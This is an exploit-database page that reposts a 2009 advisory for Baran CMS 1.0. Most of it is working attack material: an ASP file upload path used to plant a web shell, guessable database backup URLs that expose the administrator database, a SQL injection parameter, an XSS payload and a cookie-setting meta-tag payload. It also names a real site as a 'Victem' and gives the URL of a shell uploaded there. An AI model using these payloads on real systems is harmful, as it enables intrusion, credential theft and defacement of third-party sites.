header-logo
Suggest Exploit
vendor:
Baran CMS
by:
Aria-Security Team
7.5
CVSS
HIGH
Arbitrary ASP File Upload/DB/SQL/XSS/CM
N/A
CWE
Product Name: Baran CMS
Affected Version From: 1.0 (Personal)
Affected Version To: 1.0 (Personal)
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Baran Cms Arbitrary ASP File Upload/DB/SQL/XSS/CM

Baran CMS is vulnerable to Arbitrary ASP File Upload, Database backups, SQL injection and Cross-site scripting. An attacker can exploit these vulnerabilities to gain access to the system and execute malicious code.

Mitigation:

Update to the latest version of Baran CMS
Source

Exploit-DB raw data:

#########################################################################################
[0x01] Informations :
Name    : Baran Cms
Version : 1.0 (Personal)
site       : http://www.baran-cms.ir
$$         : 50$
Vul        : (Arbitrary ASP File Upload/DB/SQL/XSS/CM)
Credit    : Aria-Security Team
Website : http://Aria-Security.Net
Contact : Pouya.s3rver@Gmail.com
#########################################################################################
[0x02] Arbitrary ASP File Upload :
http://site.ir/upadmini/DEMO.asp
Up to System
shell uploaded in : http://site.ir/upadmini/Uploads/[Name.asp]
example             : http://www.zenyan.ir/upadmini/Uploads/sh3ller.asp
------------------------------------------------------------
[0x03] Database backups :
The Latest generated Database's backups
http://site.ir/[Sitename]dbdb/[1.zip,2.zip,3.zip,n+1.zip !?!]
admin.mdb + db.mdb
admin.mdb :  Administrator Information
db.mdb       :  data file
------------------------------------------------------------
[0x04] SQL :
http://site.ir/main/default.asp?CatId=[SQL]
------------------------------------------------------------
[0x05] XSS :
http://site.ir/main/default.asp?CatId=<ScrIpT>("Pouya_Server")</ScrIpT>
------------------------------------------------------------
[0x06] CM :
http://site.ir/main/default.asp?CatId=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
------------------------------------------------------------
Victem : http://www.zenyan.ir
########################################################################################
Special Thanks : The-0utl4w,AURA,Zac003,Sasan_4shir,Reza.exe,
                           black.Hat,Irsdl,T3rr0r1st,hadihadi,M0rt,Magic-Boy,Str0ke
                         Sc0rpion,Black.Shadowes,Ali_aria,bl2k,Tabalooga,Virangar,Pouya_Server
                           And All my Friend's

# milw0rm.com [2009-02-12]